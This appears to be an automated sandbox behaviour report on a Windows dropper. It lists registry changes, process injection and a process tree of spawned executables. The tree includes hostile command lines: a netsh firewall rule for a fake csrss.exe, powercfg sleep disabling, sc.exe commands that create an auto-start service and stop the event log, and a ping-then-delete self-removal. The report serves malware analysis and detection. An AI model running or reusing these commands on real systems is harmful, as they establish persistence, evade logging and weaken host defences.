Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe

Modifies registry class 1 IoCs

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4040 PING.EXE

pid	process
4040	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exeA8mFXN9X10tndnylrvwhkeAG.exevW4Nbn3LNaPo1GRZeUVmW5rG.exefI0Z7Px_wurPZCnUR9jY5Gfn.exeT0Low6kfxfOVSTCz1xKuW3FF.exeWYPUIGgN6vuEmknhIqzgRSQb.exeAe5Ds0abnrSUcQoZSmERk4De.exe

pid	process
2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
2028	A8mFXN9X10tndnylrvwhkeAG.exe
2028	A8mFXN9X10tndnylrvwhkeAG.exe
2668	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
2668	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
3188	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
3188	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
2660	T0Low6kfxfOVSTCz1xKuW3FF.exe
2660	T0Low6kfxfOVSTCz1xKuW3FF.exe
884	WYPUIGgN6vuEmknhIqzgRSQb.exe
884	WYPUIGgN6vuEmknhIqzgRSQb.exe
3444
3444
3444
3444
3444
3444
3444
3444
884	WYPUIGgN6vuEmknhIqzgRSQb.exe
884	WYPUIGgN6vuEmknhIqzgRSQb.exe
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
4164	Ae5Ds0abnrSUcQoZSmERk4De.exe
4164	Ae5Ds0abnrSUcQoZSmERk4De.exe
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

A8mFXN9X10tndnylrvwhkeAG.exe

pid process

2028 A8mFXN9X10tndnylrvwhkeAG.exe

pid	process
2028	A8mFXN9X10tndnylrvwhkeAG.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeXR9aCbvSeH0PNmiOfR0DyV7v.exe5tNzlR9NhYdEFhuQB2NB_AGP.exepowershell.exepowershell.exeRegAsm.exepowershell.EXEpowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeDebugPrivilege	1244	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Token: SeImpersonatePrivilege	1244	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeDebugPrivilege	2888	5tNzlR9NhYdEFhuQB2NB_AGP.exe
Token: SeImpersonatePrivilege	2888	5tNzlR9NhYdEFhuQB2NB_AGP.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	3352	RegAsm.exe
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeDebugPrivilege	748	powershell.EXE
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeShutdownPrivilege	2264	powercfg.exe
Token: SeCreatePagefilePrivilege	2264	powercfg.exe
Token: SeShutdownPrivilege	2504	powercfg.exe
Token: SeCreatePagefilePrivilege	2504	powercfg.exe
Token: SeShutdownPrivilege	2184	powercfg.exe
Token: SeCreatePagefilePrivilege	2184	powercfg.exe
Token: SeShutdownPrivilege	3192	powercfg.exe
Token: SeCreatePagefilePrivilege	3192	powercfg.exe
Token: SeShutdownPrivilege	3444
Token: SeCreatePagefilePrivilege	3444
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeShutdownPrivilege	1616	powercfg.exe

Suspicious use of FindShellTrayWindow 17 IoCs

Processes:

6AZO5Het33oIWLnZ2TsVqcYJ.tmp

pid process

4084 6AZO5Het33oIWLnZ2TsVqcYJ.tmp
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
3444
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3444

pid	process
3444

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe6AZO5Het33oIWLnZ2TsVqcYJ.exe6AZO5Het33oIWLnZ2TsVqcYJ.tmpjsinW_BETWxrFBeb1xXIjCeh.exeQaDS18iYQkgVOw5MGDctxUWY.exe

description	pid	process	target process
PID 2796 wrote to memory of 2036	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	QaDS18iYQkgVOw5MGDctxUWY.exe
PID 2796 wrote to memory of 2036	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	QaDS18iYQkgVOw5MGDctxUWY.exe
PID 2796 wrote to memory of 2036	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	QaDS18iYQkgVOw5MGDctxUWY.exe
PID 2796 wrote to memory of 2888	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	5tNzlR9NhYdEFhuQB2NB_AGP.exe
PID 2796 wrote to memory of 2888	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	5tNzlR9NhYdEFhuQB2NB_AGP.exe
PID 2796 wrote to memory of 2888	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	5tNzlR9NhYdEFhuQB2NB_AGP.exe
PID 2796 wrote to memory of 2668	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
PID 2796 wrote to memory of 2668	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
PID 2796 wrote to memory of 2668	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
PID 2796 wrote to memory of 4484	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	bfnZhb9C4kEsGiqq6uh2DkGw.exe
PID 2796 wrote to memory of 4484	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	bfnZhb9C4kEsGiqq6uh2DkGw.exe
PID 2796 wrote to memory of 4484	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	bfnZhb9C4kEsGiqq6uh2DkGw.exe
PID 2796 wrote to memory of 2660	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	T0Low6kfxfOVSTCz1xKuW3FF.exe
PID 2796 wrote to memory of 2660	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	T0Low6kfxfOVSTCz1xKuW3FF.exe
PID 2796 wrote to memory of 2028	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	A8mFXN9X10tndnylrvwhkeAG.exe
PID 2796 wrote to memory of 2028	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	A8mFXN9X10tndnylrvwhkeAG.exe
PID 2796 wrote to memory of 2028	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	A8mFXN9X10tndnylrvwhkeAG.exe
PID 2796 wrote to memory of 5048	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	6AZO5Het33oIWLnZ2TsVqcYJ.exe
PID 2796 wrote to memory of 5048	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	6AZO5Het33oIWLnZ2TsVqcYJ.exe
PID 2796 wrote to memory of 5048	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	6AZO5Het33oIWLnZ2TsVqcYJ.exe
PID 2796 wrote to memory of 4164	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	Ae5Ds0abnrSUcQoZSmERk4De.exe
PID 2796 wrote to memory of 4164	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	Ae5Ds0abnrSUcQoZSmERk4De.exe
PID 2796 wrote to memory of 4164	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	Ae5Ds0abnrSUcQoZSmERk4De.exe
PID 2796 wrote to memory of 3188	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
PID 2796 wrote to memory of 3188	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
PID 2796 wrote to memory of 3188	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
PID 2796 wrote to memory of 1244	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	XR9aCbvSeH0PNmiOfR0DyV7v.exe
PID 2796 wrote to memory of 1244	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	XR9aCbvSeH0PNmiOfR0DyV7v.exe
PID 2796 wrote to memory of 1244	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	XR9aCbvSeH0PNmiOfR0DyV7v.exe
PID 2796 wrote to memory of 868	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	jsinW_BETWxrFBeb1xXIjCeh.exe
PID 2796 wrote to memory of 868	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	jsinW_BETWxrFBeb1xXIjCeh.exe
PID 2796 wrote to memory of 868	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	jsinW_BETWxrFBeb1xXIjCeh.exe
PID 5048 wrote to memory of 4084	5048	6AZO5Het33oIWLnZ2TsVqcYJ.exe	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
PID 5048 wrote to memory of 4084	5048	6AZO5Het33oIWLnZ2TsVqcYJ.exe	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
PID 5048 wrote to memory of 4084	5048	6AZO5Het33oIWLnZ2TsVqcYJ.exe	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
PID 2796 wrote to memory of 884	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	WYPUIGgN6vuEmknhIqzgRSQb.exe
PID 2796 wrote to memory of 884	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	WYPUIGgN6vuEmknhIqzgRSQb.exe
PID 2796 wrote to memory of 884	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	WYPUIGgN6vuEmknhIqzgRSQb.exe
PID 2796 wrote to memory of 1864	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	l8l9RRY3_DDsTnswn30f44qI.exe
PID 2796 wrote to memory of 1864	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	l8l9RRY3_DDsTnswn30f44qI.exe
PID 2796 wrote to memory of 1864	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	l8l9RRY3_DDsTnswn30f44qI.exe
PID 2796 wrote to memory of 4304	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	smTf9RkOSDoC4v5y22bl3fvg.exe
PID 2796 wrote to memory of 4304	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	smTf9RkOSDoC4v5y22bl3fvg.exe
PID 2796 wrote to memory of 4304	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	smTf9RkOSDoC4v5y22bl3fvg.exe
PID 4084 wrote to memory of 4384	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	svchost.exe
PID 4084 wrote to memory of 4384	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	svchost.exe
PID 4084 wrote to memory of 4384	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	svchost.exe
PID 2796 wrote to memory of 4196	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	7_yhNfarqM1lgLovwKi2qclO.exe
PID 2796 wrote to memory of 4196	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	7_yhNfarqM1lgLovwKi2qclO.exe
PID 2796 wrote to memory of 4196	2796	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe	7_yhNfarqM1lgLovwKi2qclO.exe
PID 868 wrote to memory of 4904	868	jsinW_BETWxrFBeb1xXIjCeh.exe	Install.exe
PID 868 wrote to memory of 4904	868	jsinW_BETWxrFBeb1xXIjCeh.exe	Install.exe
PID 868 wrote to memory of 4904	868	jsinW_BETWxrFBeb1xXIjCeh.exe	Install.exe
PID 4084 wrote to memory of 3340	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	shgenerator.exe
PID 4084 wrote to memory of 3340	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	shgenerator.exe
PID 4084 wrote to memory of 3340	4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp	shgenerator.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 2036 wrote to memory of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
"C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2796

C:\Users\Admin\Documents\GuardFox\QaDS18iYQkgVOw5MGDctxUWY.exe
"C:\Users\Admin\Documents\GuardFox\QaDS18iYQkgVOw5MGDctxUWY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 2096
4⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 792
3⤵
- Program crash
PID:4616

C:\Users\Admin\Documents\GuardFox\vW4Nbn3LNaPo1GRZeUVmW5rG.exe
"C:\Users\Admin\Documents\GuardFox\vW4Nbn3LNaPo1GRZeUVmW5rG.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2668

C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe
"C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe
"C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:1884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:3000

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2580

C:\Users\Admin\Documents\GuardFox\bfnZhb9C4kEsGiqq6uh2DkGw.exe
"C:\Users\Admin\Documents\GuardFox\bfnZhb9C4kEsGiqq6uh2DkGw.exe"
2⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\Documents\GuardFox\T0Low6kfxfOVSTCz1xKuW3FF.exe
"C:\Users\Admin\Documents\GuardFox\T0Low6kfxfOVSTCz1xKuW3FF.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2660

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4436

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:4540

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:3692

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:636

C:\Users\Admin\Documents\GuardFox\A8mFXN9X10tndnylrvwhkeAG.exe
"C:\Users\Admin\Documents\GuardFox\A8mFXN9X10tndnylrvwhkeAG.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2028

C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe
"C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5048

C:\Users\Admin\AppData\Local\Temp\is-6QR0E.tmp\6AZO5Het33oIWLnZ2TsVqcYJ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6QR0E.tmp\6AZO5Het33oIWLnZ2TsVqcYJ.tmp" /SL5="$10003E,1678831,54272,C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4084

C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe
"C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe" -i
4⤵
- Executes dropped EXE
PID:4384

C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe
"C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe" -s
4⤵
- Executes dropped EXE
PID:3340

C:\Users\Admin\Documents\GuardFox\Ae5Ds0abnrSUcQoZSmERk4De.exe
"C:\Users\Admin\Documents\GuardFox\Ae5Ds0abnrSUcQoZSmERk4De.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe"
3⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe
"C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:1456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe
5⤵
PID:1616

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 2408
3⤵
- Program crash
PID:1924

C:\Users\Admin\Documents\GuardFox\fI0Z7Px_wurPZCnUR9jY5Gfn.exe
"C:\Users\Admin\Documents\GuardFox\fI0Z7Px_wurPZCnUR9jY5Gfn.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3188

C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe
"C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe"
2⤵
- Executes dropped EXE
